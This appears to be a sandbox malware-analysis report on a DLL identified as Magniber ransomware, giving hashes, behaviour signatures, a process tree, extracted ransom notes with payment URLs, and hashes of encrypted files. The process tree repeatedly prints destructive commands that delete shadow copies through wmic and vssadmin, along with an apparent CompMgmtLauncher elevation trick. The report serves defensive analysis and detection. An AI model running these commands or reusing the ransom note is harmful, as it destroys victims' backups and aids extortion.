Overview

overview

10

Static

static

3

aa07b96ab2...0e.dll

windows7-x64

10

aa07b96ab2...0e.dll

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27-02-2024 19:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aa07b96ab22c192c74f703b5df686c0e.dll

  • Size

    38KB

  • MD5

    aa07b96ab22c192c74f703b5df686c0e

  • SHA1

    127443fe311a7f4d6a6823ebceee705865d9a14f

  • SHA256

    7ceec3030c119c0b32adf031494a95eaa53d74205a1db89788ad5ced0220af4f

  • SHA512

    aef837180cd8aa69426fbbd530b27dd6630f8f2cc1b3a1b84a55aab335df44fb8ef54a5f5bb1a82663e29b034eaf7204a8adfa818edfe1525bd1b2c5c3fcee98

  • SSDEEP

    768:RjWwU9acnUuAMU24OIPDG02NLMCaYr/Dwy2ycKi/+hw:RS7kcTfmGhNAFOsjKi+

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt婍

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://103c22302aa4f8e050gtpiaqekj.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/gtpiaqekj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://103c22302aa4f8e050gtpiaqekj.bitslet.uno/gtpiaqekj http://103c22302aa4f8e050gtpiaqekj.flymet.club/gtpiaqekj http://103c22302aa4f8e050gtpiaqekj.canyour.xyz/gtpiaqekj http://103c22302aa4f8e050gtpiaqekj.dogper.space/gtpiaqekj Note! These are temporary addresses! They will be available for a limited amount of time! ?�
URLs

http://103c22302aa4f8e050gtpiaqekj.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/gtpiaqekj

http://103c22302aa4f8e050gtpiaqekj.bitslet.uno/gtpiaqekj

http://103c22302aa4f8e050gtpiaqekj.flymet.club/gtpiaqekj

http://103c22302aa4f8e050gtpiaqekj.canyour.xyz/gtpiaqekj

http://103c22302aa4f8e050gtpiaqekj.dogper.space/gtpiaqekj

Extracted

Path

C:\Users\Admin\Music\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://103c22302aa4f8e050gtpiaqekj.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/gtpiaqekj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://103c22302aa4f8e050gtpiaqekj.bitslet.uno/gtpiaqekj http://103c22302aa4f8e050gtpiaqekj.flymet.club/gtpiaqekj http://103c22302aa4f8e050gtpiaqekj.canyour.xyz/gtpiaqekj http://103c22302aa4f8e050gtpiaqekj.dogper.space/gtpiaqekj Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://103c22302aa4f8e050gtpiaqekj.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/gtpiaqekj

http://103c22302aa4f8e050gtpiaqekj.bitslet.uno/gtpiaqekj

http://103c22302aa4f8e050gtpiaqekj.flymet.club/gtpiaqekj

http://103c22302aa4f8e050gtpiaqekj.canyour.xyz/gtpiaqekj

http://103c22302aa4f8e050gtpiaqekj.dogper.space/gtpiaqekj

Signatures

  • Detect magniber ransomware 2 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 12 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Renames multiple (82) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 8 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\aa07b96ab22c192c74f703b5df686c0e.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt?
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:2868
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2044
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2320
      • C:\Windows\system32\wbem\wmic.exe
        C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2304
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://103c22302aa4f8e050gtpiaqekj.bitslet.uno/gtpiaqekj^&2^&37206021^&83^&351^&12"?
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://103c22302aa4f8e050gtpiaqekj.bitslet.uno/gtpiaqekj&2&37206021&83&351&12?
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2736
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2736 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2696
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
        PID:1700
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
          PID:1292
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
              PID:1688
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
          1⤵
            PID:296
          • C:\Windows\system32\Dwm.exe
            "C:\Windows\system32\Dwm.exe"
            1⤵
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1236
            • C:\Windows\system32\wbem\wmic.exe
              C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
              2⤵
                PID:556
              • C:\Windows\system32\cmd.exe
                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:904
                • C:\Windows\system32\wbem\WMIC.exe
                  C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                  3⤵
                    PID:1048
              • C:\Windows\system32\taskhost.exe
                "taskhost.exe"
                1⤵
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:1144
                • C:\Windows\system32\wbem\wmic.exe
                  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1012
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2300
                  • C:\Windows\system32\wbem\WMIC.exe
                    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                    3⤵
                      PID:2932
                • C:\Windows\system32\cmd.exe
                  cmd /c CompMgmtLauncher.exe
                  1⤵
                  • Process spawned unexpected child process
                  • Suspicious use of WriteProcessMemory
                  PID:2988
                  • C:\Windows\system32\CompMgmtLauncher.exe
                    CompMgmtLauncher.exe
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:564
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:1824
                  • C:\Windows\system32\cmd.exe
                    cmd /c CompMgmtLauncher.exe
                    1⤵
                    • Process spawned unexpected child process
                    • Suspicious use of WriteProcessMemory
                    PID:2836
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1452
                      • C:\Windows\system32\wbem\wmic.exe
                        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                        3⤵
                          PID:1904
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:524
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:592
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                        PID:2252
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:1628
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:1632
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2444
                      • C:\Windows\system32\cmd.exe
                        cmd /c CompMgmtLauncher.exe
                        1⤵
                        • Process spawned unexpected child process
                        • Suspicious use of WriteProcessMemory
                        PID:1404
                        • C:\Windows\system32\CompMgmtLauncher.exe
                          CompMgmtLauncher.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1460
                          • C:\Windows\system32\wbem\wmic.exe
                            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                            3⤵
                              PID:952
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:3000
                        • C:\Windows\system32\cmd.exe
                          cmd /c CompMgmtLauncher.exe
                          1⤵
                          • Process spawned unexpected child process
                          PID:2664
                          • C:\Windows\system32\CompMgmtLauncher.exe
                            CompMgmtLauncher.exe
                            2⤵
                              PID:1124
                              • C:\Windows\system32\wbem\wmic.exe
                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                3⤵
                                  PID:2880
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:2240
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:1596

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              98e808cf0b48faee7444c5812738a197

                              SHA1

                              b2fed0d61de435bb709e6c0f9484683d7ab11a3e

                              SHA256

                              54fc1fc068a3702ee566b7a399a6b9c1970b43dc2dcce4619a952706029cbd7e

                              SHA512

                              f18dcfb0c5c8e1ab0907c57036a64ba56091cbce75b78e2f7f7dc298c989e1ff2db847e28110389f80fb7fdd0ff41013d3e16f77c7c847db88bda85c703e4628

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              5518c3d4ab1fc690c9498e1789fd635d

                              SHA1

                              cada6e5fb0294820d123f6896311064656414dea

                              SHA256

                              c119da9005a203536aa71193db47b3b09e0416865ab390a9b49f5f6f16613a9b

                              SHA512

                              2ea8729edd2c453fdf9bceb91f7cbc3f4c58cfd7e08e00a9c194ce96105510f0f8d20357d0f2a695e60fa9d8651bf3278851ccfe70f4923e32eacdd806e827bf

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              916848322f7b81b07eefc50700db3e51

                              SHA1

                              997dc05cb222763a5c3d138dd1eb27fb4cd44745

                              SHA256

                              0cf53dc38fcc630c6adb104bac0e61587f4cf95967822d76558b674949435f24

                              SHA512

                              4095281263109c4e4348645c90570bb56837c0f999db40c431657ecc2a7be32734c33583d370a703b176893943ed86353ab533f57e1ae6d22bf4f804977deaf2

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              a2614c607aa9f715f2a8aeea25ae3b12

                              SHA1

                              858685da2c6adb1637261cd29d28033974880661

                              SHA256

                              f76743a52d7ba9190c47b3257469f0d35638ea6b91f6f1d52c3be351665093b2

                              SHA512

                              864671c38c8bbefae2f62f5009ac0998b34e641c663f50360ec9d2d69d5e4a18bf0a03260276972e221570cf0c7d7dfa365f31e7d8d99585c3ea90b10f37dc64

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              8ac50d52325bb031cfa104c0eac93d43

                              SHA1

                              a64524203e9d2f8d26af654e9cdc712f6d442985

                              SHA256

                              ccd6c1501c962a81ba5e4cc2eaecf02dcea8db3d1ab3e90b550d63899712d7a5

                              SHA512

                              12684e88ed3dfb44cf880a306bc173363b96093f23ba474b685320413ac66ec52c066bd35727f0bc23efec1e6e8aa1b421603ecace6b46f76023064076429327

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              8d572b1d8aa94bebf0f7e41db349c1a1

                              SHA1

                              95d1c502ef6d97c9ce5bf106b9c45aa4457edbd6

                              SHA256

                              5eabce36e3eab6e6ace2b983923092f696d54e78096e27c659ceca0e2456c6ba

                              SHA512

                              4769845085a27d701bff9ea0e5bbfffcbd3223ddd08bf618112fd4c2e01e8c0b5792aa48ea2f50c6aa9fba8bd87565d5107448faf3f1f30db212073b92b40a5a

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              29d68f13e1c1f1c18731c54744a02e5c

                              SHA1

                              1d82c7d6a2c8bad31d607f675a0bf927537f7764

                              SHA256

                              a147d3dcf60e86736471e2baeb6f7f0c665af59c62037990e000516c7bb0198e

                              SHA512

                              faccc3e1ca34bda6f0fda34cae47984f0cb598cb4ce99e0ac6be1860bd0f9621a5840ea901a787141270903d4380ab5585e579e6cbc02c884c197eb85c7a0adb

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              a627a29d41d93978e43c3739a5109c79

                              SHA1

                              f843034d1382859eb800cab3f301ec769cf81e4a

                              SHA256

                              154fb8f1d57817d56379580d99fe3a3b90ab72c6f09e632535e1dba378681922

                              SHA512

                              536a92e91e2d84d26749d56d0e7f22544c16eef46fd181bf4ea56be211c2220901137341d8419d599b4a7e3eca2e79fef5b623d9c3b1512e8155b1a27d99d920

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              d1fe462ae350f57a732ba23bf09b5513

                              SHA1

                              31db2f3ae5d82f25eb2e16c7ba914c570e043c6d

                              SHA256

                              804e5d8430c5bf8ac80c69bea06742168a8723225f571a8208d3358e21d6374d

                              SHA512

                              c537767472a8bd6f84362624a53112d8b4018f4049660ccf883ffac87d97413de52f720a46bcb47e3735b5fa87f342f2630062d589ceeb068cd27c635ac93bc0

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              8a91210aa3072ba9246919572041a173

                              SHA1

                              c4fffcffa921c57d514fdc423487ba6a17477aa5

                              SHA256

                              3c58b2431b80d8f727b7f629dbf4966311551555b8dfa4fe94c01c654654f520

                              SHA512

                              eae83e14a8fd87888ce55d154b468b7404f17758b968801027bd84b6996c7bcb921176a4d92d03e6a3ef0d21b85ac61703ab4289f51e2e7518dd471639160f6c

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              7d59602388151352cab24caebf876b00

                              SHA1

                              114a591c3b0c98aa2bfd41bf66d8623c3ed686ee

                              SHA256

                              4370fc2d890ec16c46084ac87dd45e76772b840dac54a9749454af8e3ef3979e

                              SHA512

                              a01f70a0523d986e315b2ab7a70f731b433f3cc1b0cfacf906d7f55ec7e45c0dde7b767db81ae2cc74f7375b1bc7ca5de1eccebb9acffcd3e156b1e38a5a9ba2

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              83130b5eff5e3d9fb84aa9ed2e3c7bf4

                              SHA1

                              d9f8af191984305c642a0ebfc00279cd26cbf5ad

                              SHA256

                              4b29128dfdcebea0691924918eb6356451c40272b2271c2bde52edf0487a44cc

                              SHA512

                              150a48c1cc791202986dcf0d6624857ade2b328c2714d3fa5de8decd1d710722cadf856943135bb7bc0441f127d7210b87cb20b38f53d7b4f983b47fa9ec7ee0

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              f50821a0deef575117cf8dadfda6c145

                              SHA1

                              c22e6ae9d384d01f943d760d6efb8016393825f2

                              SHA256

                              7a47fdfddf6d34f13892dcadb9cad3ee82ae4a23fbd30da1b63c1a79d03ea9fd

                              SHA512

                              79cf037aedadf750857f075b9af61523a8430afae3e49a9dd0753421b5a0b25b1305481554a70780738d9021b9d45dd53e698c7096f407b97f3e92b2839b0cc7

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              b0e5dc668bdb0513eb8e72b348e3440d

                              SHA1

                              4a296ea9ed12f9e821f581252e620b5b2b49932c

                              SHA256

                              c45e778373cc38e8018ac0e778c3c524bec4f00c8e809a178a8b315660f3ecb5

                              SHA512

                              62979b237949dcdff4a917d8813737131ced3a87e3bd008ef181a85c108b1f402ebc190d65230325b11a25f741f10cecee487745cc16ac17a255bb6b85603477

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              a121b388f59c51b3afccdab5572ab91f

                              SHA1

                              dae1eee1c8fad83ec632c84486042ae39a8e9db7

                              SHA256

                              160095e2495be78f22abefe46d2b766754c55ec3ed0fdc2db3e1f2e2b505ca90

                              SHA512

                              21362386186f9b7488f1adc9bb1d62cf9914d1ac4485eaffcf08f7ccdc22129fea557cecba00c8d3e661a5536a955f7f04ff471211a031db3467c9f02daa0590

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              b18a49aee94a9d8bd8044f4c7c8008ca

                              SHA1

                              dc18673c94261c9e12a9e681ef59c6ffbf350d17

                              SHA256

                              4f3e4c5f966e5312b590bfda0b88b4209a12e33349b62ed1ce1d5b8c814fa0ff

                              SHA512

                              2be789691dc628165209ecc664c6dabd9ccaccc75bea4b6f5d0fe6ba7137ab496f7e6e21b02ea6f58c56b157034f87213944d163d665889180bec1df2abb3c39

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              8963157e82335ba2b0c2a654d8ac1085

                              SHA1

                              b6ebbb82772a1dd0905bfb490fe7a649173e2392

                              SHA256

                              ba518c92576af9d0a87ee58afed9411a03743db249f18952354036be46247538

                              SHA512

                              fd6d9d2430c1146ed42b87500919e4e6bed0cbb0a165b9e6a9a0d97130cac7930a6a41d343158d26cddd2ba3b9cb389240f67bd84ea01ae672c0b111fc24d982

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              0581e4318225fea555d728990efba45a

                              SHA1

                              2fbf63317c884f95ae5776e3d703060bcc1107b6

                              SHA256

                              d1d9671cde173bd3bfc8a78692df721c045fee07a159cb9ab4e68f5c7664cfe9

                              SHA512

                              94fb5986b495c683a232ec53c5ae5bffeec7a9051a33479e1cb55f6a7f92273c058d427c1da04b1422d9a6600e19055fc04d56d738fce64e537428a13ea2f4ac

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              7805ad500806010b8c46dcd72f73c90d

                              SHA1

                              6d6b5890dda8a50d8633178bd950508be2cf2c8e

                              SHA256

                              28590d7c6582e350d74a19b382c93772d8a70f7927a9326e5e08759e776a278c

                              SHA512

                              902e0337633df00a9d831936473bfce9dd93a28e7219fa27a85cc7014bd88c6049b447c2c16aeaddeab1e1a2b52a1957afbce76119df4bc81d62adbb85391d87

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              c0eb2d553dca7074b498a2bc6a5ac228

                              SHA1

                              08565033cf289e6587257a6857292b09f62606d2

                              SHA256

                              fec4da0d7ffd1edcf87ce853cf9c417fef45565dadc77cbf9e3617a78a179c4b

                              SHA512

                              a176e2026f0f014b885e750d55e1a018f69cfff302ebfa3304404a95b982e79769aa12f48f9ed67c1944773fc4fe0eed5a6877bb1d0313aac74134982963b507

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              e00459d9ebb390fab3caeaccfb1f9475

                              SHA1

                              463a1fc539e2150e559d8c978e986347f395ddef

                              SHA256

                              996cfbfd1e0fbbb039fc011775a9adf064a45089fcdc3570412c438915a1ba3d

                              SHA512

                              bd75088d2511f7df4f841caada3c1441c95801c46a4a6f8156b619025869aca7321c100459a8e96982d1115fadc9626ad583909e80b56817efe273194a43014d

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\CabF23D.tmp
                              Filesize

                              65KB

                              MD5

                              ac05d27423a85adc1622c714f2cb6184

                              SHA1

                              b0fe2b1abddb97837ea0195be70ab2ff14d43198

                              SHA256

                              c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                              SHA512

                              6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\CabF2FB.tmp
                              Filesize

                              67KB

                              MD5

                              753df6889fd7410a2e9fe333da83a429

                              SHA1

                              3c425f16e8267186061dd48ac1c77c122962456e

                              SHA256

                              b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

                              SHA512

                              9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\TarF36E.tmp
                              Filesize

                              175KB

                              MD5

                              dd73cead4b93366cf3465c8cd32e2796

                              SHA1

                              74546226dfe9ceb8184651e920d1dbfb432b314e

                              SHA256

                              a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

                              SHA512

                              ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

                              Download Submit

                            • C:\Users\Admin\Desktop\ConfirmEdit.xltm.gtpiaqekj
                              Filesize

                              296KB

                              MD5

                              7e2cea8bcc4e4c2ed2048186c81e5b0a

                              SHA1

                              a045dbb0ea100ba9ebeae9818803700cf7b90bd2

                              SHA256

                              3cff1e2f84ad9c8603810804729c60abd072fe4292731e15b78fa5bf748b473d

                              SHA512

                              d85b528c445fb31e83c15c671df51d56d3273c62d1c0e219d1e317efa20f11e80f958ae8bf98c9d440ec2e064f90fe5205d7a7a45e12feb884551ab7b39b4d80

                              Download Submit

                            • C:\Users\Admin\Desktop\ConfirmInitialize.mpeg.gtpiaqekj
                              Filesize

                              264KB

                              MD5

                              1616b8260658647265fa13dbee1550bb

                              SHA1

                              8c1b17b60f376e951a262fc1669ec7a2ec69c194

                              SHA256

                              4dfa044b6eff9a9ec7a8f68212703ab6e72bee672db195669f6fb8356ae7a882

                              SHA512

                              f33f03b6510bd899c8e3d9843a02106cb7bfddc5fed2bc6c8d32ca2a4c235d5e99128a436090756a3bb2950754c7ab08bbe7801625ceac17bf0b41264dd87445

                              Download Submit

                            • C:\Users\Admin\Desktop\ConvertFromSwitch.wps.gtpiaqekj
                              Filesize

                              137KB

                              MD5

                              801b1db64e5385abb91d30e8e4b8a721

                              SHA1

                              51cf5c4d4fc365bbabd4d8d61bd02c5bb6b70289

                              SHA256

                              599072236e327e1662f54aa95d5211157a36b4ebd1527dc2c296a18b3a5aae2e

                              SHA512

                              6afe8bd7eb9c0b1fb790ebdca7df4f8bce584f6002ec671340fc219ed76bfbac4610a827c2d3ab1346e96a06993a8cdd6c6159e93d902b5f2260f2d7a15e70e8

                              Download Submit

                            • C:\Users\Admin\Desktop\ExpandUpdate.gif.gtpiaqekj
                              Filesize

                              455KB

                              MD5

                              d3bb2578dd88b4d2f46a648dc2f8d1f9

                              SHA1

                              c0f1ca9612be7196bd46fdb5af73576f7e79eefb

                              SHA256

                              53ec0e9a0843dc0bbfb798fbfa4c7bcdc4c26d36050b01e3b69b86c3c8616256

                              SHA512

                              a5e01432ff089e7ed555d316d30afd1d126fa2492d9eaa66fc172ec64ecbe35931b44e0732c6c4fd4bf6989875b999af81ad85c5537986645372588a5f3fd92f

                              Download Submit

